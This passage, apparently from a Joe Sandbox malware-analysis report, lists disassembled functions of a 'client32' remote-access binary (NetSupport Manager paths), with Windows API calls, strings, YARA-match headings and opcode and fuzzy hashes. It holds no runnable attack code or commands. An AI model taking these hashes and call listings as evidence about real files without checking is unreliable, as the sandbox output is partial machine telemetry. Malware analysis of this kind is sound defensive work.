                                                                                                                                                                • SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                                                                                                • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                                                                                                • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$EventObjectSingleWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2857295742-0
                                                                                                                                                                • Opcode ID: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                                                                                                • Instruction ID: 8ed48fa67f8c8c814876f8dc7215a606f8693e2702a4d531ac155f54366f369e
                                                                                                                                                                • Opcode Fuzzy Hash: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                                                                                                • Instruction Fuzzy Hash: 46011A75A087049BE7A0DFB988D4A96F7ECEF58300F11592EE5AAC3200CB78B8448F50
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemMetrics.USER32(0000004C), ref: 110955CE
                                                                                                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110955D7
                                                                                                                                                                • GetSystemMetrics.USER32(0000004E), ref: 110955DE
                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 110955E7
                                                                                                                                                                • GetSystemMetrics.USER32(0000004F), ref: 110955ED
                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 110955F5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4116985748-0
                                                                                                                                                                • Opcode ID: fa9c4e77d45f57ef8ba9ddb2250bc784ae709d2778f265b2a0ca7dc9e2878129
                                                                                                                                                                • Instruction ID: aeea33bb29268792c14f31eb16fa4a6dd0b28b2f7c44b341a1bc9cac054ba08f
                                                                                                                                                                • Opcode Fuzzy Hash: fa9c4e77d45f57ef8ba9ddb2250bc784ae709d2778f265b2a0ca7dc9e2878129
                                                                                                                                                                • Instruction Fuzzy Hash: CAF030B1B5131A6BE7009BAA8C51B55BB9CEB48664F008037A71CC7241DAB5A8108BE4
                                                                                                                                                                APIs
                                                                                                                                                                • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 1107712B
                                                                                                                                                                  • Part of subcall function 11076470: DeferWindowPos.USER32(8B000EA9,00000000,D8E85BC0,33CD335E,?,00000000,33CD335E,110771C6), ref: 110764B3
                                                                                                                                                                • EqualRect.USER32(?,?), ref: 1107713C
                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,?,33CD335E,D8E85BC0,8B000EA9,00000014,?,?,?,?,?,1107731A,00000000,?), ref: 11077196
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077172
                                                                                                                                                                • m_hWnd, xrefs: 11077177
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$DeferEqualPointsRect
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 2754115966-2830328467
                                                                                                                                                                • Opcode ID: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                                                                                                • Instruction ID: 41b5b1a8551b5e1f2f99f8414896ea4fcac58e3e889cf17ca758b789060a613c
                                                                                                                                                                • Opcode Fuzzy Hash: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                                                                                                • Instruction Fuzzy Hash: E0413EB5A006099FDB14CFA9C884EAAFBF5FF88704F108559E9559B344D770AD00CBA4
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                • String ID: %s: $CLIENT32
                                                                                                                                                                • API String ID: 4139908857-407627211
                                                                                                                                                                • Opcode ID: 62a094a11364d479d28b80ef5aae76f7f8a7792226ee52ac438638c336c03449
                                                                                                                                                                • Instruction ID: 56bb3dc9115475832d2b4b6b230f146ae0a9f7ed1e193da0a21f03333bda17cd
                                                                                                                                                                • Opcode Fuzzy Hash: 62a094a11364d479d28b80ef5aae76f7f8a7792226ee52ac438638c336c03449
                                                                                                                                                                • Instruction Fuzzy Hash: 5941153490012B9BD705CF69DC58AEEFBB5EF85709F2046A4E82A87641DB31A64DCF90
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strncpy$wsprintf
                                                                                                                                                                • String ID: %s (%s)
                                                                                                                                                                • API String ID: 2895084632-1363028141
                                                                                                                                                                • Opcode ID: 9f1f6563b36f78a1914431cce1447dd35063224e54729c55a970a140fe82f433
                                                                                                                                                                • Instruction ID: 90004c4662333843f344f99c31dc4a67423089d3fb31431f761f7f2fe8be3174
                                                                                                                                                                • Opcode Fuzzy Hash: 9f1f6563b36f78a1914431cce1447dd35063224e54729c55a970a140fe82f433
                                                                                                                                                                • Instruction Fuzzy Hash: CF31F3B4E0834A9FE721CF24D8C0BA7BBE8AF45709F004958E9458FB81E7B5E514C7A1
                                                                                                                                                                APIs
                                                                                                                                                                • PostThreadMessageA.USER32(11026AA5,752BF08B,68575608,11198F6C), ref: 1109D796
                                                                                                                                                                • SendMessageA.USER32(00000000,752BF08B,68575608,11198F6C), ref: 1109D7CF
                                                                                                                                                                  • Part of subcall function 1109D650: IsWindow.USER32(?), ref: 1109D66F
                                                                                                                                                                  • Part of subcall function 1109D650: GetClassNameA.USER32(?,?,00000040), ref: 1109D680
                                                                                                                                                                  • Part of subcall function 1109D650: FindWindowA.USER32(?,00000000), ref: 1109D6C1
                                                                                                                                                                  • Part of subcall function 1109D650: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,1109E8E9,000001F4,00000006,?,11066C00,0000048C,00000001), ref: 1109D6DC
                                                                                                                                                                  • Part of subcall function 1109D650: FindWindowA.USER32(?,00000000), ref: 1109D6ED
                                                                                                                                                                • PostMessageA.USER32(00000000,752BF08B,68575608,11198F6C), ref: 1109D7EB
                                                                                                                                                                Strings
                                                                                                                                                                • m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData), xrefs: 1109D772
                                                                                                                                                                • ..\CTL32\ipc.cpp, xrefs: 1109D76D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageWindow$FindPost$ClassNameSendSleepThread
                                                                                                                                                                • String ID: ..\CTL32\ipc.cpp$m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData)
                                                                                                                                                                • API String ID: 3524374798-1411620790
                                                                                                                                                                • Opcode ID: 67c5e620853e1d11e626b2d2fc78237df1a555fe25ff6300bbbfefdcee193b2a
                                                                                                                                                                • Instruction ID: 467c52180ee9b65f1f143bc83655d8e0b60a3a0454055de02c0751fb0dd48fa7
                                                                                                                                                                • Opcode Fuzzy Hash: 67c5e620853e1d11e626b2d2fc78237df1a555fe25ff6300bbbfefdcee193b2a
                                                                                                                                                                • Instruction Fuzzy Hash: 0521737974064AAFD314CF58E8D4D6AF3E9FB88324B10862AE55987A40D730FC50DB60
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strncpy$wsprintf
                                                                                                                                                                • String ID: %s (%s)
                                                                                                                                                                • API String ID: 2895084632-1363028141
                                                                                                                                                                • Opcode ID: f9f6e3310434217ef4c8c46f8203760207b9c186a0c62b9b29997845a76e1ea2
                                                                                                                                                                • Instruction ID: f87c7f942544fa5609db8c81607a4340159a62b7cf85849620d444029de2b445
                                                                                                                                                                • Opcode Fuzzy Hash: f9f6e3310434217ef4c8c46f8203760207b9c186a0c62b9b29997845a76e1ea2
                                                                                                                                                                • Instruction Fuzzy Hash: 60317376A04702AFC314DF65C8C0ED3B7A9BF89318B00591DE54A87E41E772F465CB94
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                                                                                                • _strrchr.LIBCMT ref: 1114315A
                                                                                                                                                                • _strrchr.LIBCMT ref: 1114316A
                                                                                                                                                                • wsprintfA.USER32 ref: 11143185
                                                                                                                                                                  • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                                                                                                • String ID: CLIENT32
                                                                                                                                                                • API String ID: 2529650285-3575452709
                                                                                                                                                                • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                                                                                                • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                                                                                                • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                                                                                                • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
                                                                                                                                                                APIs
                                                                                                                                                                • KillTimer.USER32(00000000,00000001), ref: 1104D51F
                                                                                                                                                                  • Part of subcall function 11037F50: wsprintfA.USER32 ref: 11037FBE
                                                                                                                                                                  • Part of subcall function 11037F50: SetDlgItemTextA.USER32(?,?,?), ref: 1103808F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ItemKillTextTimerwsprintf
                                                                                                                                                                • String ID: AckDlgTimeoutAccept$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 1646146092-175777528
                                                                                                                                                                • Opcode ID: f215e8b6413442d04b3451991cc880a85c16dd1b79b50f35b06b58bef8d6d570
                                                                                                                                                                • Instruction ID: d5468b0f3d8a416eff1aa5c481de97aef7fe48a1706f439c4557e335cb460193
                                                                                                                                                                • Opcode Fuzzy Hash: f215e8b6413442d04b3451991cc880a85c16dd1b79b50f35b06b58bef8d6d570
                                                                                                                                                                • Instruction Fuzzy Hash: 33112679B0070AABE710CAA5DC80FAFB3D9AB94718F204439FA1587680DA70F841C7A5
                                                                                                                                                                APIs
                                                                                                                                                                • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11065366
                                                                                                                                                                • _memmove.LIBCMT ref: 110653B1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProfileString_memmove
                                                                                                                                                                • String ID: Device$No default printer,,LPT1:$Windows
                                                                                                                                                                • API String ID: 1665476579-2460060945
                                                                                                                                                                • Opcode ID: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                                                                                                • Instruction ID: a358cf5610f4a81608be9fe47ec1da84b056d0ceaed1d9bd2f397f709d6f9fc8
                                                                                                                                                                • Opcode Fuzzy Hash: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                                                                                                • Instruction Fuzzy Hash: 0E119E35D002669AD700CFB0DC45BFEBBACDF01788F144158DC869B240EAF22609C3E1
                                                                                                                                                                APIs
                                                                                                                                                                • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 111317AE
                                                                                                                                                                Strings
                                                                                                                                                                • DisableRunplugin, xrefs: 111317E8
                                                                                                                                                                • Check9xLogon - [bLoggedIn: %u] send command %d to connections, xrefs: 11131822
                                                                                                                                                                • Client, xrefs: 111317ED
                                                                                                                                                                • Shell_TrayWnd, xrefs: 111317A9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FindWindow
                                                                                                                                                                • String ID: Check9xLogon - [bLoggedIn: %u] send command %d to connections$Client$DisableRunplugin$Shell_TrayWnd
                                                                                                                                                                • API String ID: 134000473-1587978603
                                                                                                                                                                • Opcode ID: 005ebd3838b9853926394f1176bd741e02b5462fb98bbae0602bbe92db2bf6b2
                                                                                                                                                                • Instruction ID: 7cc168f205ac9f83591635f10e1202901ad1310e74e2146c021d4d98835a13fc
                                                                                                                                                                • Opcode Fuzzy Hash: 005ebd3838b9853926394f1176bd741e02b5462fb98bbae0602bbe92db2bf6b2
                                                                                                                                                                • Instruction Fuzzy Hash: 9311067971131AAAEB059BD6CD85BBDF6789B4032EF410069E92096188EB70D444C751
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(000007D0,?,00000001,00000000,?,TerminateVistaUI), ref: 111079DC
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,11107C7C,?,?,?,TerminateVistaUI), ref: 111079ED
                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,11107C7C,?,?,?,TerminateVistaUI), ref: 11107A05
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,11107C7C,?,?,?,TerminateVistaUI), ref: 11107A12
                                                                                                                                                                  • Part of subcall function 110F5E90: WaitForSingleObject.KERNEL32(?,00000000,?,?,111079B5,?,TerminateVistaUI), ref: 110F5EA1
                                                                                                                                                                  • Part of subcall function 110F5E90: InterlockedExchange.KERNEL32(?,00000000), ref: 110F5EAD
                                                                                                                                                                  • Part of subcall function 110F5E90: CloseHandle.KERNEL32(00000000), ref: 110F5EB8
                                                                                                                                                                  • Part of subcall function 110F5E90: InterlockedIncrement.KERNEL32(111F05FC), ref: 110F5EE5
                                                                                                                                                                Strings
                                                                                                                                                                • Warning. SendToVistaPipe no pipe, from=%s, xrefs: 111079A1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalInterlockedSection$CloseEnterExchangeFileHandleIncrementLeaveObjectSingleSleepWaitWrite
                                                                                                                                                                • String ID: Warning. SendToVistaPipe no pipe, from=%s
                                                                                                                                                                • API String ID: 2034980497-1588131313
                                                                                                                                                                • Opcode ID: 8791a8239dc897272c06ef7d45a1c05d26153b13ed1e30f7087315d541416186
                                                                                                                                                                • Instruction ID: b576ba414e1e298cd3819816e1cc722d527cd760e4656e9653b3731492105499
                                                                                                                                                                • Opcode Fuzzy Hash: 8791a8239dc897272c06ef7d45a1c05d26153b13ed1e30f7087315d541416186
                                                                                                                                                                • Instruction Fuzzy Hash: 1301C071600759AFEB049FA4DC85EAAF3ADFB8872DF40452AF95687540D770AC40CB61
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf$ItemText
                                                                                                                                                                • String ID: %d%%$0%%
                                                                                                                                                                • API String ID: 3736328045-1572943365
                                                                                                                                                                • Opcode ID: 1cbf6e26115518571587392b494dd67441ffe33dfc485d6b94f43bae65133930
                                                                                                                                                                • Instruction ID: 2b1e674ca0a54edc907812ade49eb5592baca34932e185c63fa3aaecf06507b2
                                                                                                                                                                • Opcode Fuzzy Hash: 1cbf6e26115518571587392b494dd67441ffe33dfc485d6b94f43bae65133930
                                                                                                                                                                • Instruction Fuzzy Hash: 5F01D471A1061CAFC718DF75CD85EAAB7B9EB88209F408129E85597240EE31FD04C761
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                                                                                                  • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                                                                                  • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                                                                                  • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                                                                                  • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                                                                                  • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 111455D9
                                                                                                                                                                • LoadBitmapA.USER32(00000000,00000000), ref: 111455EF
                                                                                                                                                                • SendDlgItemMessageA.USER32(00000000,00003A97,00000172,00000000,00000000), ref: 1114562B
                                                                                                                                                                Strings
                                                                                                                                                                • ..\ctl32\util.cpp, xrefs: 11145609
                                                                                                                                                                • hGrip || !"Unable to load sizing grip bitmap", xrefs: 1114560E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$AddressBitmapColorDefaultFreeItemLangMessageProcSendSystemVersion_memset
                                                                                                                                                                • String ID: ..\ctl32\util.cpp$hGrip || !"Unable to load sizing grip bitmap"
                                                                                                                                                                • API String ID: 1044520585-3315463184
                                                                                                                                                                • Opcode ID: 6dab67b1f8d1b8d84d11e25cc4a1c1bf0e98613e631c68fda75dbc45b93d1bcc
                                                                                                                                                                • Instruction ID: 4fd7b2c5b7bb95ac5b9160b37f44e12b5346297b3eaef3b7f99d0903c6763c9c
                                                                                                                                                                • Opcode Fuzzy Hash: 6dab67b1f8d1b8d84d11e25cc4a1c1bf0e98613e631c68fda75dbc45b93d1bcc
                                                                                                                                                                • Instruction Fuzzy Hash: 15F0BB36F4422533D61056B15C06FEBBB5C8B44B6DF044031FE28EAA81DD74990093E5
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                                                                                                  • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                                                                                  • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                                                                                  • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                                                                                  • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                                                                                  • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                                                                                • LoadLibraryA.KERNEL32(gdi32.dll,?,7696CF90,?,11003CD2,00000000,00000008), ref: 11145585
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 11145597
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,11003CD2,00000000,00000008), ref: 111455AE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressFreeLoadProc$DefaultLangSystemVersion_memset
                                                                                                                                                                • String ID: SetLayout$gdi32.dll
                                                                                                                                                                APIs
                                                                                                                                                                • GetMenu.USER32(00000000), ref: 110BD735
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000002), ref: 110BD74D
                                                                                                                                                                • DrawMenuBar.USER32(00000000), ref: 110BD761
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD71F
                                                                                                                                                                • m_hWnd, xrefs: 110BD724
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeString$__wcsicoll_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeString$__wcsicoll_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4048096073-0
                                                                                                                                                                • Opcode ID: 74278988d92a0981e88ab1d304f7346d2170d04ffe63c1026edbb1760bdfed18
                                                                                                                                                                • Instruction ID: afac08f90629e30a7cffcb3f7cc11dd9a67156a1a1d83c27ab3f33a937463f4c
                                                                                                                                                                • Opcode Fuzzy Hash: 74278988d92a0981e88ab1d304f7346d2170d04ffe63c1026edbb1760bdfed18
                                                                                                                                                                • Instruction Fuzzy Hash: 1951D731E00306DFDB508FA5C98069EFBB9AF413A4F158269E86597290F7F29970CF51
                                                                                                                                                                APIs
                                                                                                                                                                • EndPagePrinter.WINSPOOL.DRV(?), ref: 110657F2
                                                                                                                                                                • EndDocPrinter.WINSPOOL.DRV(?), ref: 110657F8
                                                                                                                                                                • ClosePrinter.WINSPOOL.DRV(?,?), ref: 110657FE
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11065806
                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 1106583A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Printer.$Close$HandlePageSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2391129857-0
                                                                                                                                                                • Opcode ID: b1bb8c1d5ba9991a9cd61f9f5830dcfcfd6faf83c7c2a0de74e0bd8fc72b6850
                                                                                                                                                                • Instruction ID: 2188d8da6c3b50539d481e9d7151b6b6488d697895cb624f8313360327e1a8df
                                                                                                                                                                • Opcode Fuzzy Hash: b1bb8c1d5ba9991a9cd61f9f5830dcfcfd6faf83c7c2a0de74e0bd8fc72b6850
                                                                                                                                                                • Instruction Fuzzy Hash: 0D416D75E00705EFEB00DF64DC80B9EBBE9BF48399F1181A9D919AB281D775A940CF50
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000012,?,00000001,?), ref: 110B3A13
                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 110B3A83
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                                                                • String ID: $8$xoffset=%d, yoffset=%d
                                                                                                                                                                • API String ID: 3168844106-373005067
                                                                                                                                                                • Opcode ID: cf0f5f12bababd7c73818f773dfd45466a6321e6dd973d90dccd5780fa010a61
                                                                                                                                                                • Instruction ID: 13f5dbf056a5fff6eb7eb2ddb131ca7f79cbfefb462763ec63b32f60666cabc3
                                                                                                                                                                • Opcode Fuzzy Hash: cf0f5f12bababd7c73818f773dfd45466a6321e6dd973d90dccd5780fa010a61
                                                                                                                                                                • Instruction Fuzzy Hash: 0151F3B5E082499FDB50CFA8D480B9EBBF4FF88304F20856EE819A7240E7756901CF55
                                                                                                                                                                APIs
